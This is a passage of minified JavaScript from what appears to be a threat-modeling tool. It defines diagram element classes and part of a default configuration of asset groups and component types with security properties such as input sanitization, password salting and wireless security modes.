children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetDFDElement(e))),a.sort((e,i)=>e.GroupId>=i.GroupId?1:-1)}get Root(){return this.project.GetDFDElement(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}AddChild(a){null!=a?a.ID!=this.ID&&(this.Data.childrenIDs.includes(a.ID)||(a.Parent=this,this.Data.childrenIDs.push(a.ID),this.project.AddDFDElement(a),a instanceof Ys&&(a.Root=this.Root?this.Root:this),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0))):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteDDFElement(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){let a=[];return a.push(...this.GetChildren()),this.GetChildren().forEach(e=>{e instanceof Ys&&a.push(...e.GetChildrenFlat())}),a}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}Ys.Icon="select_all",Ys.ElementTypeID=Et.None;class zm extends Ys{get diagramID(){return this.project.FindDiagramOfElement(this.Ref.ID).ID}get Name(){var a;return(null===(a=this.Ref)||void 0===a?void 0:a.GetProperty("Name"))+"-Reference"}set Name(a){this.Ref&&(this.Ref.Name=a)}get Ref(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.Data.refID)}set Ref(a){this.Data.refID=a.ID,this.rerouteEvents()}constructor(a,e,i,n){super(a,e,i,n),this.project=i,this.config=n,this.rerouteEvents()}GetProperty(a){return"Ref"==a?this.Ref:"diagramID"==a?this.diagramID:this.Ref.GetProperty(a)}SetProperty(a,e){this.Ref.SetProperty(a,e)}initProperties(){super.initProperties(),this.AddProperty("properties.GoToRef","diagramID","",!0,Ii.DiagramReference,!1)}rerouteEvents(){!this.Ref||(this.Ref.NameChanged.subscribe(a=>this.NameChanged.emit(a)),this.Ref.DataChanged.subscribe(a=>this.DataChanged.emit(a)),this.Ref.TypeChanged.subscribe(a=>this.TypeChanged.emit(a)))}static InstantiateRef(a,e,i){let n=new zm({},a.GetProperty("Type"),e,i);return n.Ref=a,n.Data.Name="Reference to "+a.ID,n}}class M5 extends Ys{}class Up extends M5{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.LogTrustArea}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Up.ElementTypeID);return e||(e=a.CreateStencilType(Up.ElementTypeID),e.Name="Trust Area",e.IsDefault=!0),e}}Up.ElementTypeID=Et.LogTrustArea;class Gg extends M5{constructor(a,e,i,n){super(a,e,i,n),this.Data.ElementTypeID=Et.PhyTrustArea}static GetDefaultType(a){let e=a.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Gg.ElementTypeID);return e||(e=a.CreateStencilType(Gg.ElementTypeID),e.Name="Phy Trust Area",e.IsDefault=!0),e}}Gg.ElementTypeID=Et.PhyTrustArea;const _we=JSON.parse('{"Data":{"ID":"3bf9addd-53b8-4d01-9971-7128326f856d","Name":"Default Configuration","Description":"","Version":5,"threatLibraryID":"e17870ae-2c37-435c-a284-8df90ff7a5f0","DFDthreatRuleGroupsID":"1d995fc2-d7a5-4f46-ae16-954b8603b7fe","assetGroupID":"58e45260-36fa-43d7-ac37-198dcce12952","stencilThreatRuleGroupsID":"dc027a7a-9824-4b6a-befb-cc68270f2ecb","componentThreatRuleGroupsID":"b02f311c-0bb2-4057-9dde-6225ebbf4e1b","controlLibraryID":"6dd5db7a-e54f-4e6f-858a-33449024cf88"},"assetGroups":[{"ID":"58e45260-36fa-43d7-ac37-198dcce12952","Name":"Asset Groups","Description":"","assetGroupIDs":["cb2b51c2-63a8-4f7a-bf0b-a6ec8b248b78","148b81d8-2c0a-454d-a95c-d993e67c7266","fd5d32e6-212c-4b26-a129-d1a87d014c1d","9e0b09ae-246e-4000-b17d-ff71b142e881"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"9e0b09ae-246e-4000-b17d-ff71b142e881","Name":"Manufacturer Assets","Description":"","assetGroupIDs":["90d512d4-583d-47d1-a174-55d7441b7495"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"fd5d32e6-212c-4b26-a129-d1a87d014c1d","Name":"Owner Assets","Description":"","assetGroupIDs":["15dcf410-df02-4824-83e6-ef80b63a6da9","cb8c3cec-c2ec-444a-a148-9dec9825e92e"],"assetIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"90d512d4-583d-47d1-a174-55d7441b7495","Name":"Intellectual Property (IP)","Description":"","assetGroupIDs":["e0abf169-5402-4fa6-bd56-49e6f154a6d6","354b8f5d-756b-400b-80cb-100182918021","1f2a21a0-c358-4140-861f-c795453f6322"],"assetIDs":["5eb076d6-7bb3-42bc-8727-d1c1b5933afc","ae6eb58b-6f72-470c-8ea3-ff7af01a201a","7fcf997f-5c00-4a8b-9ade-3e8325ad391e"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"148b81d8-2c0a-454d-a95c-d993e67c7266","Name":"User Assets","Description":"","assetGroupIDs":["3ba3acb5-8e8c-49cf-b9d9-86df13c39dd6","2d6f3914-6d2a-46ff-9699-56ec9f0f0034"],"assetIDs":["a0a5e6ff-950a-4da6-a757-ef134f1548b0","d0ed6d37-a544-43d1-b94d-4924cabbf26a"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"cb2b51c2-63a8-4f7a-bf0b-a6ec8b248b78","Name":"Common Assets","Description":"","assetGroupIDs":["abc10bed-01eb-4e3d-8743-f3a48b710844","95809a78-46fd-48a4-a840-d3271b11d71d"],"assetIDs":["346e2669-f5a1-4790-9033-e6937d5448a2"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"15dcf410-df02-4824-83e6-ef80b63a6da9","Name":"Physical Property","Description":"","assetGroupIDs":["9293377e-1a41-40fa-8bd7-e603c7b73fc2","e946820d-0adc-4b9a-a1b1-d7f361c7d82a"],"assetIDs":["fdd56e01-0633-4797-accc-b5c0207d6ebb","077e1f6d-094a-44d6-a8a1-1ac3978f00eb"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"cb8c3cec-c2ec-444a-a148-9dec9825e92e","Name":"Virtual Property","Description":"","assetGroupIDs":["f4a97cef-26dd-48c1-8cce-68d2cf6fab1d","51e182b7-5608-4f8c-9281-3e15725d1837"],"assetIDs":["f15e8bbe-77a8-4b91-bcda-92f4e1c2ed5d","c3910e35-3353-490f-9fc2-da60660e444c"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"95809a78-46fd-48a4-a840-d3271b11d71d","Name":"Functionality & Safety","Description":"","assetGroupIDs":["5e07e85d-cdb4-4c3f-8294-eba6d865eab6","76f4759e-f5d8-4b34-a142-969fbe754562"],"assetIDs":["4aa77061-1e91-430e-a662-6466f3926678","7f62763b-8816-4569-8455-b96788d9e479"],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[]},{"ID":"5e07e85d-cdb4-4c3f-8294-eba6d865eab6","Name":"Logical Operations","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,14,5]},{"ID":"76f4759e-f5d8-4b34-a142-969fbe754562","Name":"Physical Operations","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,15,9,14]},{"ID":"3ba3acb5-8e8c-49cf-b9d9-86df13c39dd6","Name":"Collected Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[1,10,11]},{"ID":"2d6f3914-6d2a-46ff-9699-56ec9f0f0034","Name":"Health","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[9]},{"ID":"e0abf169-5402-4fa6-bd56-49e6f154a6d6","Name":"Hardware IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"354b8f5d-756b-400b-80cb-100182918021","Name":"Software IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"1f2a21a0-c358-4140-861f-c795453f6322","Name":"Process IP","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[12,1]},{"ID":"9293377e-1a41-40fa-8bd7-e603c7b73fc2","Name":"Device","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[3,12,14]},{"ID":"e946820d-0adc-4b9a-a1b1-d7f361c7d82a","Name":"Environment","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[9,15]},{"ID":"f4a97cef-26dd-48c1-8cce-68d2cf6fab1d","Name":"Configuration","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,5]},{"ID":"51e182b7-5608-4f8c-9281-3e15725d1837","Name":"Generated Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[2,1,10]},{"ID":"abc10bed-01eb-4e3d-8743-f3a48b710844","Name":"Authentication Data","Description":"","assetGroupIDs":[],"associatedDataIDs":[],"IsActive":true,"ImpactCats":[1,2,4,5,10]}],"myData":[],"stencilTypes":[{"Name":"Process","Description":"","ElementTypeID":11,"IsDefault":true,"ID":"e0b99432-98a6-4e32-86d7-ca5f58897cc2","Properties":[{"DisplayName":"Sanitizes Input","ID":"47889e58-6875-4fe5-aa04-91ea9054a166","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Sanitizes Output","ID":"5afac92d-d86d-49bc-8fd8-84242a651767","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Uses Authorization Mechanism","ID":"eb92cc8a-bceb-48a5-b0fd-0894a1d91c5c","Tooltip":"Implements or uses a mechanism for authorization","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Processor","Description":"","ElementTypeID":12,"IsDefault":true,"ID":"e8430761-3c2e-4db0-adbd-5310214574c2","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Data Store","Description":"","ElementTypeID":21,"IsDefault":true,"Properties":[{"DisplayName":"Contains Logs","ID":"ContainsLogs","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Contains Sensitive Data","ID":"ContainsSensitiveData","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Contains User Data","ID":"ContainsUserData","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}],"ID":"c7598413-4382-43e9-9904-fd9d877eb7a9"},{"Name":"Phy Data Store","Description":"","ElementTypeID":22,"IsDefault":true,"Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Is Encrypted","ID":"IsEncrypted","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Checks Integrity","ID":"c31746fb-c296-4eda-b7a5-8227640e9c80","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Allows Boot","ID":"43deca38-18ab-4c2b-98f0-52f0b1bfefac","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Volatile","ID":"IsVolatile","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Removable","ID":"IsRemovable","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Writable","ID":"IsWritable","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is Multiple Writable","ID":"IsMultipleWritable","Editable":false,"Type":"Check Box","DefaultValue":true}],"ID":"80aa0465-21e0-41bd-b521-84a346c5f54b"},{"Name":"Ext. Entity","Description":"","ElementTypeID":31,"IsDefault":true,"ID":"02b39924-b8f2-44da-a2bc-be1bd2450f68","Properties":[{"DisplayName":"Allows User Input","ID":"7632a126-216a-4463-83ef-6ce82331d9f8","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2}]},{"Name":"Phy Ext. Entity","Description":"","ElementTypeID":32,"IsDefault":true,"ID":"03e3750c-8549-4589-8269-e0121b3f26a4","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Allows User Input","ID":"18571d26-3d51-45b8-96f0-ff6e273e70c6","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}]},{"Name":"Data Flow","Description":"","ElementTypeID":41,"IsDefault":true,"Properties":[{"DisplayName":"Uses Custom Com. Protocol","ID":"1fec597f-dfd0-4fcc-b348-828307b946ee","Tooltip":"Implements or uses a custom communication protocol","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has JSON Payload","ID":"758fa1ec-35f3-44a2-9f3d-0e5c21fc92c4","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Overwrite Data","ID":"OverwriteDataProperties","Tooltip":"By default, processed data and data sensitivity are referenced from sender. Overwrite to set them manually","Editable":true,"HasGetter":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Protocol Stack","ID":"ProtocolStack","Tooltip":"List of protocols used within the communication","Editable":true,"HasGetter":true,"Type":"Protocol Select","DefaultValue":[]},{"DisplayName":"Overwrite Stack","ID":"OverwriteProtocolProperties","Tooltip":"Use either the properties derived from the protocols or define them manually","Editable":true,"HasGetter":true,"Type":"Check Box","DefaultValue":false}],"ID":"b395ada9-bc1d-4df9-b9f3-a1b09ee2a5aa"},{"Name":"Trust Area","Description":"","ElementTypeID":71,"IsDefault":true,"ID":"8f95badd-15c2-4bd6-9146-67b34f24c724","Properties":[]},{"Name":"Phy Trust Area","Description":"","ElementTypeID":72,"IsDefault":true,"ID":"edd93ea1-6122-492c-bbef-332ecf0113b3","Properties":[]},{"Name":"Physical Link","Description":"","ElementTypeID":51,"IsDefault":true,"ID":"04be7cf6-00dd-4aa8-b90b-e9bf105e39e7","Properties":[{"DisplayName":"Processed Data","ID":"ProcessedData","Tooltip":"Data that the element processes, stores, produces, or receives","Editable":true,"HasGetter":true,"Type":"Data Select","DefaultValue":[]},{"DisplayName":"Data Sensitivity","ID":"ProcessedDataSensitivity","Tooltip":"Sensitivity of the processed data","Editable":true,"HasGetter":true,"Type":"Low Medium High Select","DefaultValue":2},{"DisplayName":"Is Sensor","ID":"NewProperty1","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is Actuator","ID":"NewProperty3","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"Name":"Interface","Description":"","ElementTypeID":61,"IsDefault":true,"Properties":[{"DisplayName":"Is Wireless","ID":"IsWireless","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Enables Access To Critical Function","ID":"db9caa64-fec1-47e8-9ed8-97896030cc90","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Requires Authentication","ID":"a5bb6218-f4e3-445f-95b3-1fc0be602d36","Tooltip":"Authentication is always required before performing any functionality","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"4e797b3d-fcdd-43ce-953e-8d5af2c47d91"},{"Name":"DFD Container","Description":"","ElementTypeID":0,"IsDefault":true,"ID":"02b4631b-a8fd-47f6-b264-cb5fcedd2b1a","Properties":[]},{"ID":"967a0727-3f2f-4fa8-a549-f9b7bd4efbc5","Name":"Subprocess","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Subprocess Diagram","ID":"SubprocessDiagram","HasGetter":false,"Editable":true,"Type":"Diagram Reference","DefaultValue":false},{"DisplayName":"Go To Subprocess","ID":"SubprocessDiagram","HasGetter":false,"Tooltip":"","Editable":false,"Type":"Diagram Reference"}],"ElementTypeID":11},{"Name":"Microprocessor","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Has Trusted Execution Environment","ID":"HasTrustedExecutionEnvironment","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Root of Trust","ID":"HasRootofTrust","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"8bd42f0c-a4d2-4d98-9dcb-b9b100114fa5"},{"Name":"ASIC","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Is Custom Design","ID":"IsCustomDesign","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is In-House Produced","ID":"IsIn-HouseProduced","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"6065e8dd-23c0-4dc9-ad51-628af88f3309"},{"Name":"Crypto Processor","Description":"","ElementTypeID":12,"IsDefault":false,"Properties":[{"DisplayName":"Has True RNG","ID":"HasTrueRNG","Editable":true,"Type":"Check Box","DefaultValue":true,"Tooltip":"Has True Random Number Generator (RNG)"},{"DisplayName":"Has PUF","ID":"HasPUF","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"7b968a35-bdd2-4dec-b54b-6fca0bc93058"},{"ElementTypeID":21,"Name":"File","Description":"","PropertyOverwrites":[],"ID":"9ebca319-a256-406b-b548-28a4b44f15b1","IsDefault":false,"Properties":[]},{"Name":"Config File","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[],"PropertyOverwrites":[],"ID":"9ebe3a8f-eedb-40cd-9cbf-d1012a1829e2"},{"Name":"User Database","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[{"DisplayName":"Password Is Hashed","ID":"ea6098a1-cc93-4f7d-a6c6-e9ec84e8c393","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Password Is Salted","ID":"452b2b74-1eb6-4edb-8921-274b2332c7bf","Tooltip":"Password hash is calculated of the joining of password and salt","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"ContainsUserData","Value":true}],"ID":"367702af-ceba-459b-84e5-27efe918968e"},{"Name":"Log File","Description":"","ElementTypeID":21,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"ContainsLogs","Value":true}],"ID":"a74ba004-2165-4721-9b9b-2ce4b9df88c2"},{"Name":"SRAM","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[{"DisplayName":"Clears Content on State Transition","ID":"NewProperty1","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsVolatile","Value":true}],"ID":"69401648-0084-45ca-b984-505173c9cdb1"},{"Name":"FLASH","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"ID":"4409e854-5f53-4e7e-bee5-232c0e27fb40"},{"Name":"OTP","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsMultipleWritable","Value":false}],"ID":"44d3f1c3-d8cb-4fd8-bccf-1fe409b36992"},{"Name":"SD Card","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsRemovable","Value":true}],"ID":"1959aadb-553f-491d-9e5c-665245093d95"},{"Name":"USB Flash Drive","Description":"","ElementTypeID":22,"IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"IsRemovable","Value":true}],"ID":"565e2ea5-b296-44b0-a5ca-8b4a06cfcc06"},{"ElementTypeID":31,"Name":"Browser","Description":"","ID":"049bfa6e-d0b9-4f8d-9920-dfaa78523c85","IsDefault":false,"Properties":[]},{"ID":"99f696a1-6684-4650-993c-d83d1cdb35a2","Name":"HTTP","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":41,"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["857c7b5e-e034-41f8-9b60-ee11aa9771f1"]}]},{"ElementTypeID":41,"Name":"HTTPS","Description":"","ID":"4ae2efbd-9c4e-4885-bdaa-ba9f34ed5c9b","IsDefault":false,"Properties":[],"PropertyOverwrites":[{"Key":"ProtocolStack","Value":["21731335-5e66-455c-9b6a-6796ac85577a"]}]},{"ElementTypeID":51,"Name":"Sensor","Description":"","ID":"dffbfc0a-850b-4de0-95fb-ab9ea4273d88","IsDefault":false,"Properties":[{"DisplayName":"Measures Human-related Value","ID":"13649f62-1bd6-4b50-9646-a9df988262a5","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}]},{"Name":"JTAG","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Disabled after Production","ID":"e8430761-3c2e-4db0-adbd-5310214574c2","Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"cf7355d0-6f0c-4ad8-afa2-8689a81e28b8"},{"Name":"CAN","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"f9209f6d-3f5b-4e72-8c03-75531058d0f2","templateDFDID":"ffd00d05-c506-4bf9-af35-0b0f56234515"},{"ID":"e1fea26b-dbcf-4c9f-af27-d7453687cded","Name":"UART","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":61},{"Name":"SPI","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"c4967596-a83f-4530-84a6-afe75fec1a7b","templateDFDID":"0d2497f5-d83a-44ac-91ca-6453a7a0e2b4"},{"Name":"USB","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Supports HID Class","ID":"23564ce2-4786-4144-85b6-d03de2771d6b","Tooltip":"Supports HID (Human Interface Device) class, which is, for example, used for keyboard and mouse","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Supports Mass Storage Class","ID":"e884ecfe-bda1-4f0b-86f7-3ce0d735aeeb","Tooltip":"Supports mass storage class, which is, for example, used for storing files","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ID":"111a5819-f53f-4a8d-81df-6b756a20efe7","templateDFDID":"054dd0d3-961a-4f18-9aee-92ac1b515392"},{"Name":"Ethernet","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[],"ID":"58e0c62c-e5b7-4e9f-9f8a-f8150cf18930","templateDFDID":"fad91fd1-0a2b-4ab0-a069-5362948e5f47"},{"ID":"4edf4a31-e828-4933-9a87-779083e7167e","Name":"RF Module","Description":"Proprietary protocols, e.g. protocols that use the 860 MHz band","IsDefault":false,"Properties":[{"DisplayName":"Limits Duty Cycle","ID":"229d9064-0034-4e55-998e-a50d8e0f9dd4","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ElementTypeID":61,"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"templateDFDID":"5135733f-bcb2-459e-a84b-048c832f5616"},{"Name":"WiFi","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Has WPS","ID":"8fbc9cce-7d30-425a-ac50-c5ca44d206b0","Tooltip":"Supports Wi-Fi Protected Setup (WPS)","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Uses WPA3","ID":"f7509951-f156-4774-89e9-1966b03ef03e","Tooltip":"Uses the Wi-Fi Protected Access 3 protocol","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"ID":"59f2fd67-bc38-4447-9c14-d9306283bbe9","templateDFDID":"1ad7afbf-59a5-41ec-905e-621602e17ea6"},{"Name":"Bluetooth","Description":"","ElementTypeID":61,"IsDefault":false,"Properties":[{"DisplayName":"Has Secure Version","ID":"80419a47-0ac7-488f-b958-da045b67d91f","Tooltip":"At the time of writing, it is advised to use at least Bluetooh BR/EDR version 4.1 or Bluetooth LE version 4.2","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Secure Mode","ID":"cf1429d9-c9e7-4dc4-a54c-42596f246692","Tooltip":"Secure modes are numeric comparison, passkey entry and out of band. Just works is not secure.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Has Highest Security Level","ID":"a4f10f42-4b29-4cbf-a849-0844b011609b","Tooltip":"There are four security levels. The highest level, Security Level 4, should be used.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"PropertyOverwrites":[{"Key":"IsWireless","Value":true}],"ID":"2460a6c9-40e5-44c7-b133-10c6654efd18","templateDFDID":"f6abd33c-f527-4621-9a09-1ee5466aee01"},{"Name":"Internet Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[],"ID":"b76ebd30-234d-4704-bf27-ab3e0bf5ae97"},{"Name":"Company Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[{"DisplayName":"Has Network Monitoring","ID":"6e0c2499-9e6b-42da-8e9c-c34d40fca0db","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":false}],"ID":"4a5bbdcf-ef9a-49cb-ac4c-a05dcefd95d2"},{"Name":"Local Area","Description":"","ElementTypeID":71,"IsDefault":false,"Properties":[],"ID":"9f80b636-e7a4-4782-b529-24235055ebe3"},{"ID":"6b8b580e-f99a-4e0c-850d-241fccfd0079","Name":"Device Casing","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Is Mobile","ID":"e9148055-f813-45da-85a8-bfcf4d71ff40","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":72},{"Name":"PCB","Description":"","ElementTypeID":72,"IsDefault":false,"Properties":[{"DisplayName":"Is Custom Design","ID":"IsCustomDesign","Editable":true,"Type":"Check Box","DefaultValue":true},{"DisplayName":"Is In-House Produced","ID":"IsIn-HouseProduced","Editable":true,"Type":"Check Box","DefaultValue":false},{"DisplayName":"Is Replaceable","ID":"IsReplaceable","Editable":true,"Type":"Check Box","DefaultValue":true}],"ID":"a051ae84-5f0a-4f8e-a468-2d309cd7223f"},{"ID":"361cf331-bd80-413d-835a-ac900f091906","Name":"Chip/IC","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":72},{"ID":"74245351-b923-4cd6-b9e7-fe9f9916cbf5","Name":"SQL Database","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":21},{"ID":"0e15730c-980a-4a58-a2e2-b10b9de30d6d","Name":"Button","Description":"","IsDefault":false,"Properties":[],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"6b505c9a-c505-4305-8c07-a3cde1c1ddfc","Name":"Display","Description":"","IsDefault":false,"Properties":[{"DisplayName":"Enables Authentication","ID":"04fc735e-8da5-409d-93c9-5d56eb0a852d","Tooltip":"Users can log in to the system, usually by entering username and password.","HasGetter":false,"Editable":true,"Type":"Check Box","DefaultValue":true}],"ElementTypeID":51,"PropertyOverwrites":[{"Key":"NewProperty1","Value":false},{"Key":"NewProperty3","Value":true}]},{"ID":"1dc32bac-147f-42a4-a13c-44e5b59f7b81","Name":"Battery Power 